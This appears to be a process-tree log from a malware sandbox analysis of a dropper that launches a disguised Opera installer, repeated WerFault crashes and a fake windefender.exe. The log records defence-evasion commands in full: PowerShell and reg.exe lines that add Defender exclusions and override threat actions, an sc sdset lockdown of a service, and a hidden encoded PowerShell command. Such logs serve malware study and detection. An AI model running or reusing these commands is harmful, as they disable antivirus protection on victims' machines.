                                                    "C:\Users\Admin\Pictures\kKvpKmnMp4fgI8GluXYHvgrz.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1648 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240204205113" --session-guid=9ec78c6f-7417-44ad-b3d2-f482df1b2bc7 --server-tracking-blob=ZTBhOWExZjQwN2RiZTllNzU0YzMxMTAzYzU5ODg3Y2VlNGQ5MWVmM2E0MGEwNGRjOGRjZTg3YTkxODA2YjdiZjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjExIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNzA3OTg1MC40MjEzIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJkMzAwOWZhMS0xNzkzLTRjZmQtYWRjNS1lODFiZTJlYWY0OTIifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=A005000000000000
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Enumerates connected drives
                                                    PID:3772
                                                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\kKvpKmnMp4fgI8GluXYHvgrz.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\kKvpKmnMp4fgI8GluXYHvgrz.exe" --version
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:1524
                                                  • C:\Users\Admin\Pictures\kKvpKmnMp4fgI8GluXYHvgrz.exe
                                                    C:\Users\Admin\Pictures\kKvpKmnMp4fgI8GluXYHvgrz.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x310,0x314,0x318,0x2ec,0x31c,0x6ec79558,0x6ec79564,0x6ec79570
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:416
                                                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042051131\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042051131\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:2332
                                                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042051131\assistant\assistant_installer.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042051131\assistant\assistant_installer.exe" --version
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:4208
                                                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042051131\assistant\assistant_installer.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042051131\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x842614,0x842620,0x84262c
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      PID:4980
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                2⤵
                                                  PID:4876
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe" -Force
                                                  2⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2556
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 2572 -ip 2572
                                                1⤵
                                                  PID:3112
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 2572 -ip 2572
                                                  1⤵
                                                    PID:2204
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2572 -ip 2572
                                                    1⤵
                                                      PID:4880
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 2572 -ip 2572
                                                      1⤵
                                                        PID:3852
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2572 -ip 2572
                                                        1⤵
                                                          PID:400
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2572 -ip 2572
                                                          1⤵
                                                            PID:4836
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2572 -ip 2572
                                                            1⤵
                                                              PID:4244
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2572 -ip 2572
                                                              1⤵
                                                                PID:3976
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2572 -ip 2572
                                                                1⤵
                                                                  PID:3180
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2572 -ip 2572
                                                                  1⤵
                                                                    PID:3936
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2572 -ip 2572
                                                                    1⤵
                                                                      PID:3472
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2572 -ip 2572
                                                                      1⤵
                                                                        PID:5020
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2572 -ip 2572
                                                                        1⤵
                                                                          PID:2504
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2572 -ip 2572
                                                                          1⤵
                                                                            PID:3328
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2572 -ip 2572
                                                                            1⤵
                                                                              PID:3916
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2572 -ip 2572
                                                                              1⤵
                                                                                PID:944
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2572 -ip 2572
                                                                                1⤵
                                                                                  PID:1996
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2572 -ip 2572
                                                                                  1⤵
                                                                                    PID:576
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2572 -ip 2572
                                                                                    1⤵
                                                                                      PID:1936
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1968 -ip 1968
                                                                                      1⤵
                                                                                        PID:4812
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1968 -ip 1968
                                                                                        1⤵
                                                                                          PID:2344
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1968 -ip 1968
                                                                                          1⤵
                                                                                            PID:828
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                              2⤵
                                                                                                PID:4676
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1968 -ip 1968
                                                                                              1⤵
                                                                                                PID:4624
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1968 -ip 1968
                                                                                                1⤵
                                                                                                  PID:2132
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1968 -ip 1968
                                                                                                  1⤵
                                                                                                    PID:1272
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4848 -ip 4848
                                                                                                    1⤵
                                                                                                      PID:3400
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1968 -ip 1968
                                                                                                      1⤵
                                                                                                        PID:1724
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1968 -ip 1968
                                                                                                        1⤵
                                                                                                          PID:2340
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4848 -ip 4848
                                                                                                          1⤵
                                                                                                            PID:4576
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4848 -ip 4848
                                                                                                            1⤵
                                                                                                              PID:2164
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4848 -ip 4848
                                                                                                              1⤵
                                                                                                                PID:3200
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1968 -ip 1968
                                                                                                                1⤵
                                                                                                                  PID:3392
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4848 -ip 4848
                                                                                                                  1⤵
                                                                                                                    PID:416
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4848 -ip 4848
                                                                                                                    1⤵
                                                                                                                      PID:1380
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4848 -ip 4848
                                                                                                                      1⤵
                                                                                                                        PID:3512
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4848 -ip 4848
                                                                                                                        1⤵
                                                                                                                          PID:2764
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4848 -ip 4848
                                                                                                                          1⤵
                                                                                                                            PID:396
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3384 -ip 3384
                                                                                                                            1⤵
                                                                                                                              PID:3916
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3384 -ip 3384
                                                                                                                              1⤵
                                                                                                                                PID:3616
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3384 -ip 3384
                                                                                                                                1⤵
                                                                                                                                  PID:3908
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 3384 -ip 3384
                                                                                                                                  1⤵
                                                                                                                                    PID:5016
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3384 -ip 3384
                                                                                                                                    1⤵
                                                                                                                                      PID:4812
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 3384 -ip 3384
                                                                                                                                      1⤵
                                                                                                                                        PID:4320
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 3384 -ip 3384
                                                                                                                                        1⤵
                                                                                                                                          PID:2188
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3384 -ip 3384
                                                                                                                                          1⤵
                                                                                                                                            PID:1804
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                              2⤵
                                                                                                                                                PID:4948
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3384 -ip 3384
                                                                                                                                              1⤵
                                                                                                                                                PID:576
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 3384 -ip 3384
                                                                                                                                                1⤵
                                                                                                                                                  PID:3980
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 3372 -ip 3372
                                                                                                                                                  1⤵
                                                                                                                                                    PID:1724
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 3372 -ip 3372
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2340
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 3372 -ip 3372
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2692
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 3372 -ip 3372
                                                                                                                                                        1⤵
                                                                                                                                                          PID:3996
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3372 -ip 3372
                                                                                                                                                          1⤵
                                                                                                                                                            PID:2132
                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              2⤵
                                                                                                                                                                PID:5092
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 3372 -ip 3372
                                                                                                                                                              1⤵
                                                                                                                                                                PID:3408
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 3384 -ip 3384
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:3708
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3372 -ip 3372
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:1120
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3372 -ip 3372
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:4732
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 3384 -ip 3384
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:1192
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 3372 -ip 3372
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:3912
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3372 -ip 3372
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:2112
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 3372 -ip 3372
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:3360
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 3372 -ip 3372
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:1712
                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:4316
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3372 -ip 3372
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:4856
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3372 -ip 3372
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:4176
                                                                                                                                                                                    • C:\Users\Admin\Pictures\kKvpKmnMp4fgI8GluXYHvgrz.exe
                                                                                                                                                                                      C:\Users\Admin\Pictures\kKvpKmnMp4fgI8GluXYHvgrz.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x31c,0x320,0x324,0x2ec,0x328,0x6df09558,0x6df09564,0x6df09570
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                      PID:4556
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                      PID:1172
                                                                                                                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5092
                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:3708
                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:228
                                                                                                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:1868
                                                                                                                                                                                            • C:\Windows\windefender.exe
                                                                                                                                                                                              C:\Windows\windefender.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                              PID:1056
                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                              sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                              PID:2188
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:4912
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\ugeOWMZ.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\ugeOWMZ.exe Lc /pbsite_idWLf 385118 /S
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                PID:1960
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                  PID:2328
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:1232
